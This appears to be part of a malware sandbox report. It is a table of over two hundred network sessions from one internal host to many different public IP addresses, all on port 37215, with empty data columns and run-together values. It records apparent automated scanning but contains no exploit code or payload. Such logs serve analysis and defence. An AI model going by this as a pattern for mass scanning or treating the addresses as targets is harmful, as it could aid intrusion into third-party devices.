                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17520192.168.2.1557624222.234.48.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17521192.168.2.1556528186.199.131.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17522192.168.2.153695845.140.124.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17523192.168.2.1559018138.30.196.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17524192.168.2.154267831.158.246.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17525192.168.2.1533016181.249.158.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17526192.168.2.1550836197.162.102.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17527192.168.2.155336041.215.144.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17528192.168.2.154151441.184.5.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17529192.168.2.1543262138.135.101.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17530192.168.2.154997445.16.253.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17531192.168.2.1535296122.11.127.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17532192.168.2.1548074181.234.241.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17533192.168.2.1555050222.14.168.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17534192.168.2.1552940197.140.155.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17535192.168.2.155326641.234.134.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17536192.168.2.1551198186.217.110.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17537192.168.2.1559766156.238.22.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17538192.168.2.154652231.32.124.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17539192.168.2.1537084197.131.80.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17540192.168.2.1541162197.228.199.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17541192.168.2.1540678190.187.237.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17542192.168.2.155799845.145.71.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17543192.168.2.1560682138.243.171.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17544192.168.2.1554046156.57.179.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17545192.168.2.154844431.127.188.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17546192.168.2.155196841.237.144.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17547192.168.2.153400631.51.242.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17548192.168.2.1545206186.216.24.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17549192.168.2.1541358197.9.238.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17550192.168.2.1545804138.118.126.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17551192.168.2.1536112156.144.35.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17552192.168.2.1536078121.160.60.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17553192.168.2.1533770186.237.53.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17554192.168.2.1559606186.224.111.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17555192.168.2.155163694.142.131.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17556192.168.2.1547602138.85.88.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17557192.168.2.1539468181.13.239.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17558192.168.2.154705037.5.95.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17559192.168.2.1554578222.230.158.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17560192.168.2.1558792138.127.59.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17561192.168.2.1552218186.232.89.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17562192.168.2.1557908186.249.10.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17563192.168.2.155557494.71.230.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17564192.168.2.1547296186.10.164.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17565192.168.2.154120231.122.132.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17566192.168.2.1537052121.45.103.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17567192.168.2.1538142181.168.253.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17568192.168.2.1557028186.167.249.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17569192.168.2.1557802197.178.167.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17570192.168.2.1546912190.73.142.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17571192.168.2.1536554186.118.60.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17572192.168.2.1546310122.216.184.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17573192.168.2.1544048197.71.75.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17574192.168.2.1555684156.180.119.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17575192.168.2.1553908156.79.31.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17576192.168.2.1539248156.122.80.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17577192.168.2.155196431.9.214.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17578192.168.2.155157237.232.94.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17579192.168.2.1536112181.129.112.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17580192.168.2.1540198121.208.47.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17581192.168.2.1554952181.244.107.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17582192.168.2.1555576197.85.243.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17583192.168.2.1541192138.241.184.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17584192.168.2.1557258157.127.120.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17585192.168.2.1549028157.154.139.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17586192.168.2.1555004138.24.199.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17587192.168.2.1556580157.158.73.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17588192.168.2.1544962121.38.63.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17589192.168.2.153382245.12.231.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17590192.168.2.1560040156.211.247.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17591192.168.2.1550590138.249.243.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17592192.168.2.1543706186.133.42.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17593192.168.2.1538432190.83.226.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17594192.168.2.1556504156.143.36.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17595192.168.2.1547346186.32.62.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17596192.168.2.1550526102.65.202.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17597192.168.2.1558766186.122.63.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17598192.168.2.1552514156.194.159.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17599192.168.2.153785031.129.9.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17600192.168.2.153895231.154.29.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17601192.168.2.1559430197.34.249.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17602192.168.2.1537788197.188.87.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17603192.168.2.1551654181.32.150.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17604192.168.2.1552836122.133.242.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17605192.168.2.1557084157.221.49.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17606192.168.2.155810241.206.173.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17607192.168.2.1537588121.217.200.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17608192.168.2.1543806190.58.90.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17609192.168.2.1548174197.129.47.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17610192.168.2.1538634122.15.138.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17611192.168.2.1548740186.23.185.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17612192.168.2.154690845.100.241.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17613192.168.2.155658045.13.172.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17614192.168.2.1544100121.33.172.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17615192.168.2.156022094.88.46.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17616192.168.2.1554934181.77.14.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17617192.168.2.1559638138.116.161.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17618192.168.2.1542118156.71.92.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17619192.168.2.1546148122.210.198.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17620192.168.2.1535118122.185.33.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17621192.168.2.1551092181.186.12.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17622192.168.2.155802237.9.88.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17623192.168.2.1539216156.58.185.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17624192.168.2.153386645.229.190.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17625192.168.2.154467631.107.83.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17626192.168.2.1553954157.81.31.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17627192.168.2.1551360121.15.114.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17628192.168.2.1550268122.162.205.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17629192.168.2.1550174197.171.54.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17630192.168.2.154100094.39.90.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17631192.168.2.1539266102.206.105.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17632192.168.2.1559476102.175.18.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17633192.168.2.153735037.123.242.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17634192.168.2.1557078181.238.40.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17635192.168.2.1545542102.221.30.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17636192.168.2.1557734138.215.121.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17637192.168.2.155146845.11.85.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17638192.168.2.1547692138.178.206.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17639192.168.2.154863437.59.51.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17640192.168.2.1560186122.24.137.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17641192.168.2.1543636157.241.210.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17642192.168.2.1547724181.92.192.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17643192.168.2.1538296121.164.123.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17644192.168.2.1553870201.20.103.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17645192.168.2.1535882102.249.175.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17646192.168.2.154184831.214.252.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17647192.168.2.154713094.185.16.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17648192.168.2.1538228186.199.207.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17649192.168.2.1541906138.21.204.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17650192.168.2.1550398190.242.223.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17651192.168.2.153881437.254.145.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17652192.168.2.1533256122.22.139.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17653192.168.2.154149841.219.128.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17654192.168.2.1553756222.84.79.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17655192.168.2.1549170156.172.194.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17656192.168.2.1539680157.75.49.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17657192.168.2.1548322157.97.193.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17658192.168.2.1558398102.63.131.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17659192.168.2.153356831.215.228.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17660192.168.2.155836441.167.23.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17661192.168.2.1549700156.96.36.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17662192.168.2.1560400222.167.51.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17663192.168.2.1554696157.49.255.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17664192.168.2.155841431.38.153.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17665192.168.2.1557248186.82.159.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17666192.168.2.1541240186.2.67.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17667192.168.2.1551086157.131.249.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17668192.168.2.1545330138.127.88.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17669192.168.2.1554134157.38.211.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17670192.168.2.1539820156.122.237.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17671192.168.2.1551394138.133.249.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17672192.168.2.1540802102.32.164.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17673192.168.2.1558512181.241.116.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17674192.168.2.154602645.150.107.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17675192.168.2.1536126190.107.166.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17676192.168.2.155937645.231.94.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17677192.168.2.1554836186.71.74.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17678192.168.2.1556200122.240.186.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17679192.168.2.155829694.206.205.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17680192.168.2.1550732156.82.188.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17681192.168.2.1545886222.3.190.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17682192.168.2.1557288222.147.48.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17683192.168.2.154881245.167.130.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17684192.168.2.1554516121.223.181.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17685192.168.2.153696641.158.64.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17686192.168.2.154519094.56.186.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17687192.168.2.153852045.53.198.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17688192.168.2.1541784222.82.141.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17689192.168.2.155065294.43.57.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17690192.168.2.1548180121.93.170.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17691192.168.2.1559306138.2.97.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17692192.168.2.1535090121.6.79.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17693192.168.2.1560414157.145.137.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17694192.168.2.1537860222.162.119.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17695192.168.2.153781641.174.68.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17696192.168.2.1535790186.253.179.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17697192.168.2.1552262102.198.238.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17698192.168.2.1556102102.157.47.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17699192.168.2.1547244157.198.245.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17700192.168.2.154461445.77.255.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17701192.168.2.153709237.215.248.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17702192.168.2.1559098121.40.101.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17703192.168.2.1552920190.117.101.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17704192.168.2.1549726100.199.182.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17705192.168.2.1551014181.184.243.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17706192.168.2.1539200181.84.0.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17707192.168.2.1554930157.173.164.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17708192.168.2.1537670157.120.79.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17709192.168.2.153930431.59.181.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17710192.168.2.1554146190.72.245.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17711192.168.2.1549206157.178.220.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17712192.168.2.1542750157.35.243.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17713192.168.2.1538170138.14.250.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17714192.168.2.1542470190.16.97.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17715192.168.2.1541248122.129.20.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17716192.168.2.1538468156.145.208.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17717192.168.2.154820041.237.169.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17718192.168.2.155252241.37.52.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17719192.168.2.153994245.141.50.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17720192.168.2.1534842222.24.25.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17721192.168.2.1549394122.81.114.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17722192.168.2.1560224122.63.235.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17723192.168.2.1541074157.190.114.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17724192.168.2.1534490138.159.254.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17725192.168.2.1549098102.129.122.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17726192.168.2.155554437.182.151.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17727192.168.2.1559686121.192.105.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17728192.168.2.1549236102.208.136.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17729192.168.2.1544012151.97.113.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17730192.168.2.154348494.35.226.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17731192.168.2.1534370181.191.198.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17732192.168.2.1534828156.131.243.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17733192.168.2.1533746156.7.175.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17734192.168.2.155104837.114.164.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17735192.168.2.155273831.179.153.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17736192.168.2.153739660.89.42.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17737192.168.2.154797845.230.29.8737215
                                              TimestampBytes transferredDirectionData


